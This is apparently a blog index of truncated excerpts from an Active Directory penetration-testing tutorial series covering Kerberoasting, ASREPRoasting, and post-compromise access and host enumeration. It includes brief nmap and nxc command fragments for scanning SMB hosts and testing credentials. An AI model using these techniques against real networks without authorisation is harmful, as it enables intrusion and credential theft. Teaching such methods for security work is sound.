Posts

Intro Quick Recap In order to understand how Kerberoasting works, we first need to do a quick recap over the Kerberos authentication flow. We know that in order to get tickets for a user we can do an AS-REP request to the KDC passing our authentication details and it will return us a ticket for the principal we authenticated as: We also already went through the unauthenticated ASREPRoasting attack, which happens when the user we get the TGT to does not require pre-authentication, so we just specified his username in the AS-REP and as the session key in the AS-REQ is encrypted with the user hash, we could try to crack it....

Enumerating Accesses Once you got credentials, the first thing you should do is to confirm accesses and privileges you have over the machines in the internal network, paying special attention to machines where you have any administrative access, or privileges to access it remotely. In Active Directory, the main alternatives for remote access are usually WinRM, RDP and SMB (if you are local administrator). # SMB: Usually requires you to be local administrator on the machine nxc smb smbHosts....

ASREPRoasting (Requires usernames) ASREPRoasting is an attack that leverages misconfigured Active Directory accounts that do not require pre-authentication. Normally, when a user attempts to authenticate via Kerberos, to get the first TGT, the Key Distribution Center (KDC) requires them to first send, along their username, a timestamp encrypted using the user’s password hash. When the DONT_REQ_PREAUTH flag is set for a user account, though, attackers can authenticate and request the TGT (AS-REQ) without this hashed timestamp....

Enumerating Machines Finding AD-Joined Hosts The first step you can do is use simple tools to enumerate the internal network, identifying hosts with SMB ports open, as this is the main service used for communication between AD-joined machines and servers. There are 3 main alternatives for that: nmap Do a simple port scan across the entire network to find hosts with port 139 and 445 open: nmap -p139,445 -Pn <IP_RANGE> -oG smb....

Introduction to Active Directory In simple terms, Active Directory (or AD) is a way to centralize the management and administration of Windows environments. A trick to remember its goal is to rethink how it is called, and why it is a Directory. As described by Microsoft: “A directory is a hierarchical structure that stores information about objects on the network”. And that’s exactly what these type of environments do, allow to store, manage and use information over the objects inside a network....